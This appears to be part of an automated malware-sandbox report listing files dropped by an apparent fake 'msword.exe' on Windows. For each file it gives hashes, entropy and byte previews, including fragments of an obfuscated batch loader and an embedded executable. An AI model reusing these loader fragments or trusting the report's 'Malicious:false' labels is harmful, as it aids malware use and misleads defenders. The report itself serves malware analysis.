                                                                          SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                                                                          C:\Users\user\AppData\Local\Temp\Automatic

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):89403
                                                                          Entropy (8bit):7.99813128639969
                                                                          Encrypted:true
                                                                          SSDEEP:1536:WvzNmlhJS1NqPa2dvcaUjV1a8lW12m0tJURtrJFubAca7D87sxHf:Wv8iNCDcS8kQsz2bAcaE7sxHf
                                                                          MD5:3FF8403A4564EE7F0732F6A1ECEB194C
                                                                          SHA1:C9EFFAC660CDD5B789928EB9C1AFF4A79F2EAED6
                                                                          SHA-256:7EADEF0349D3391EAAA4931B910A12239F118AF38FFEBF5C54C68BDC5CEAAA3E
                                                                          SHA-512:8859C01D4CC10D0F09FD86F56B30E38073C973397775741BCEEC26F3F12423E22BA3B765C234D42A5DF705021AFA8DE2EF50E90F9E01931060A94ECEE1CEE698
                                                                          Malicious:false
                                                                          Preview:..o*...>........0%........]Z7EK.K(.I....Y...(..cJ.ls....r. .eD...G.A.K.t.......b.H.,|..1.|k..T.-.-..{uF....[h....e...OA+....8:.{.H....y.....a.T...A%m..z..]2.l....j./..=.b....x..FT..h1})...s.....G..e...h...*.o.GQk..].6..k:...H...H...q...Y.+^.#....&JG{x7Lz....o...8O..j.G/.Z4..2q=..9.0.Y3.6B@.]^.>.F.@1..v..GK.R..8-(.0(z..`B...aO....6E....1.po.B.-&.h.:.:....L..!N..=.1....n.i...~..17<........r.`.W.Q..A.=.?....Q^....*A.!...h.._......Jw.......Eh*GR0..Ki:U.4...".....o..l.VoZ.....Rv.lz...... .(..2v.t..q.B..!g.S..._...*.x.~,o.8..*@M.........C.q.oY...V...R.........S..4..r4...g.u.vy[.js....5[l6p.....F.^..Au.....N..my.)y.......]._....22.V|..N..i.......=.%<.Z..D.Q.u..d.[wdz^7.}.{....n,.......j........_i..oXl...#...J!...\..c..Q..p.=.PN.|.Y...1..<...g.e.......0..3..u..tP=8....bA...w...@].$...'?......*....V.J.ko..f"...o..[]F...V..$..6......A=..t.v.W.........zub..d.y>X9/.<0.........Oi.u..Y.S.W..L2...$.A.}....x....2../F....R.1.:7"\|GU.v.'.;.

                                                                          C:\Users\user\AppData\Local\Temp\Fires

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):89088
                                                                          Entropy (8bit):7.99803755231603
                                                                          Encrypted:true
                                                                          SSDEEP:1536:4HUCJTibUP87NmFlHoTTX91f9FjcCKxMxdcAwPPLDAdd+DgEbGOHNN+d6n3hlcFD:SWbv8F94f1Fjc6x4Tmd+DeOtN+dURlav
                                                                          MD5:DC54D0D4B55783075A2501B87D0C8D31
                                                                          SHA1:FEF29A787871C091260C34301D451BE56601CF53
                                                                          SHA-256:EFEC3D913AAF25D26D8EC4652340E132A0739B319DB62B12D2332461A2544777
                                                                          SHA-512:EABDCFE474DB5B0EA0CC5AE6D3E0CA11B2D785F2C47E1716983E7196CBDE306B69111123C602C40CCABF72481694D7C32E8FE61AE2C38581D04F768A869839CE
                                                                          Malicious:false
                                                                          Preview:.ke..)....-}f..-...._.....5..'......&.4X...I../...<.....l..4@B..."..J.).FJ.v:^....%.././....+.9..5}....\l.jS..3...ev.B...%...S.S...cG.=j.I).i..\..*.... .2.q<..v+..N.B.^.%.r.k..4...*7....pB..G.B7.Y.................-t.e.(.Q...C5....j.h}.n.....Z..........zE.~..I.t....XY...b..P|......\..3..hc].......)..k.....[_.J.g&\..3..a..h....w...h...J...e.n.sg,.j..r...N..K{..._1..by..2]j.Z.cb.D....D.b...9.t..D.M.2-...%.L~$6..aZ.Z.h't.*.|....i.Z...&..(...Z.....f...P..f.?.[......D....l.......v|..e...,......?...+.jvG..)...Z.Trx...H.{.......v..f.0.Mc..e'k.....1..@..k.Jvj..H..v.U'J@..U.].Z..P>Pp..<.+.X8B.R.....,%.y..k..._(.HG..|..%.CaI......P.....nN..&F.hH...+....|P.h..)$"Em.(-./..+.....!.........BI$'.........x....b...o.b.v......._.....#.j.."[. ..b..h......j..*MH.".a^.q...fF.HB*.w..)D.......Ms:.a...h.....QL.~3..v8....[..*C.....GA..jo...,..Z..m....Z`.W2.<..N....L..w.e.uoV9..d..E..C.d8...C...?....e....M9P.x2.Gt.yv.6..e.~.?@j....L^A*Z....L.Y..C..e....0...]@....qZ".

                                                                          C:\Users\user\AppData\Local\Temp\MSI3d8b6.LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):246
                                                                          Entropy (8bit):3.4969396028059014
                                                                          Encrypted:false
                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8qKDaRlDCH:Qw946cPbiOxDlbYnuRKtKYc
                                                                          MD5:8B44E256E146333D8DD68B98EFADE861
                                                                          SHA1:39D10467519DD3E1F13A7B61B2267C809DB6B40D
                                                                          SHA-256:53A4B8F43F58C984B6913D6DAFEE063EA2E2C04C46C4CF9C3B7D694D9557BD73
                                                                          SHA-512:1F18E3845AD1E0AA03E9C89587FC8DCF58889F38A3FCE2F61DCDF480593B589D09F82B53FD60E596CA33578D685F0460840CE7952191CE6A8D57709110A81E3D
                                                                          Malicious:false
                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.2./.1.2./.2.0.2.4. . .1.3.:.0.7.:.2.3. .=.=.=.....

                                                                          C:\Users\user\AppData\Local\Temp\Missouri

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):885684
                                                                          Entropy (8bit):6.621979600120346
                                                                          Encrypted:false
                                                                          SSDEEP:12288:UV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:uxz1JMyyzlohMf1tN70aw8501
                                                                          MD5:B52BB2B76BB34CE2AD510641DB438931
                                                                          SHA1:316D724878B112E97A432EC85D10A993BF073274
                                                                          SHA-256:0AE073B61844F6F34FA87101DC67487FE4256547A5633D8362BBE659B3CBBFED
                                                                          SHA-512:06A3DF9F4910E6C45A074368F3182A37CFC1DE91C749FDBF9C874FB23A555EDB1425534B62E63B23823744A7DF89A677A0455C08563B10F5F74F155014865702
                                                                          Malicious:false
                                                                          Preview:..=DxL..=HxL...|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I..........Vj.P....I..E$.G..E..G<.E .G@.E.P.7..4.I..E.+E.GD.E.+E.j.j..GH....I.Pj0.7....I.j.W..wL..\....=.wL..u.h..@.j(j.j.....I...wL....wL...wL.j..5.xL..G................_^[..]. .3........."......'....M..P....M..R...U..}..W..wL.........xL....t{..xL.3.V....0...M.8V:t..V:9............}.........t...td...t....tQ...tC~)....1.~8.uVWQ....I....t....t..u..#0...F8.3.@^_]...3........}......F8.....

                                                                          C:\Users\user\AppData\Local\Temp\Phpbb

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:ASCII text, with very long lines (449), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):9301
                                                                          Entropy (8bit):5.189766528618456
                                                                          Encrypted:false
                                                                          SSDEEP:192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
                                                                          MD5:3D5A3A147ED08ACC8A92B1B79225B16C
                                                                          SHA1:E9E24609206C346DF77B7E49E48838604765339D
                                                                          SHA-256:D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
                                                                          SHA-512:8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
                                                                          Malicious:false
                                                                          Preview:Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie

                                                                          C:\Users\user\AppData\Local\Temp\Phpbb.bat

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:ASCII text, with very long lines (449), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):9301
                                                                          Entropy (8bit):5.189766528618456
                                                                          Encrypted:false
                                                                          SSDEEP:192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
                                                                          MD5:3D5A3A147ED08ACC8A92B1B79225B16C
                                                                          SHA1:E9E24609206C346DF77B7E49E48838604765339D
                                                                          SHA-256:D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
                                                                          SHA-512:8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
                                                                          Malicious:false
                                                                          Preview:Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie

                                                                          C:\Users\user\AppData\Local\Temp\Response

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):78848
                                                                          Entropy (8bit):7.997642474583827
                                                                          Encrypted:true
                                                                          SSDEEP:1536:C8rW6c7wZq1wCXK1yDWHgpipHZAGuQetnB3vzrCtvPCoj2fQCyqMsgkE:dK7wZdCX3zopyyet1fmvPCToq8
                                                                          MD5:1C2CD5510A8B8BE255D26B74FBFC61EF
                                                                          SHA1:8DD84BE3314E46C2A41BFBD2D9873859D3F88B54
                                                                          SHA-256:8F7445D8F645AF42CC36F82642DF091756CF5DF22C5E32E695C5EB999194B0E5
                                                                          SHA-512:E0CE8FDB77E40CB073A0FEEDDCBCFF075439F601224374445E578B4BC02AC01B3A114E0612D7A6D90214F1D4AC2ACFE380DF4E8DBD3E428A8D9496E39C4F22A7
                                                                          Malicious:false
                                                                          Preview:>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V......*.U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5*l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W..*..u..*.a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-|Cdg.L.........J.8{| ..5...-.h....!.... f.W..p.^...*.&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...*b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

                                                                          C:\Users\user\AppData\Local\Temp\Statistical

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):7938
                                                                          Entropy (8bit):6.234825901896176
                                                                          Encrypted:false
                                                                          SSDEEP:192:BHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3ygxn:BHAHhww+/2nlP3r1WAL3yQn
                                                                          MD5:E65ADD0B46D5C8C0DEC008C11CBD71A5
                                                                          SHA1:894028D96A4649AC5403F3CE0FAF0C686AED4E32
                                                                          SHA-256:17610DA19952CEA20324EA64C7D6A8F27F21C639845F1C14B21194A0F5C2EA99
                                                                          SHA-512:B5FF13313576084EE8B0631F4F7D2518186165D25F7AB3DF7273A8CEF2D47E1DF322602A36441A4072A94B1F5E55D75DC5706CF92DBCAAD72B29B9E397BE6649
                                                                          Malicious:false
                                                                          Preview:DimPieLilHot..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10mkvs3z.rvk.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1y3kmcsj.jn0.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4txo0zil.s5g.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mpoqkal.r3z.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlfmjzz1.35w.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzolc2nt.ihe.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tf0j3sko.c3h.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjcg02xu.qhr.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-12 13-07-17-591.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393)
                                                                          Category:dropped
                                                                          Size (bytes):16525
                                                                          Entropy (8bit):5.33860678500249
                                                                          Encrypted:false
                                                                          SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                          MD5:C3FEDB046D1699616E22C50131AAF109
                                                                          SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                          SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                          SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                          Malicious:false
                                                                          Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):15114
                                                                          Entropy (8bit):5.374001707205436
                                                                          Encrypted:false
                                                                          SSDEEP:384:nB3wPR95U1gQzye1lSgeqQPSm12VJ7/RixaOYcYdtNykhGsZPmOzXyXCPMe8mf3S:MIu
                                                                          MD5:81D7838094FA362B2FB9B4FCF2AB7082
                                                                          SHA1:D57FB62B9EEDD0110DF21067156E5A8933EDDEF2
                                                                          SHA-256:1F7A5AFEA5D207852FD57F1966AE1A35C0211ED1B5A1BFFD6E1AB217D69290B8
                                                                          SHA-512:E421AC2572A2F9FA12CB76BECEEE0826BF6E89A0FF37AD0F8955202A155A2F94D1495B634E55124A3D26E72CE6A120215892575DE5047E848A0A2733A6106540
                                                                          Malicious:false
                                                                          Preview:SessionID=03eb45c0-6f15-4e02-8f47-7bcad9f98910.1734026837616 Timestamp=2024-12-12T13:07:17:616-0500 ThreadID=1988 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=03eb45c0-6f15-4e02-8f47-7bcad9f98910.1734026837616 Timestamp=2024-12-12T13:07:17:635-0500 ThreadID=1988 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=03eb45c0-6f15-4e02-8f47-7bcad9f98910.1734026837616 Timestamp=2024-12-12T13:07:17:635-0500 ThreadID=1988 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=03eb45c0-6f15-4e02-8f47-7bcad9f98910.1734026837616 Timestamp=2024-12-12T13:07:17:635-0500 ThreadID=1988 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=03eb45c0-6f15-4e02-8f47-7bcad9f98910.1734026837616 Timestamp=2024-12-12T13:07:17:635-0500 ThreadID=1988 Component=ngl-lib_NglAppLib Description="SetConf

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29752
                                                                          Entropy (8bit):5.405554483807884
                                                                          Encrypted:false
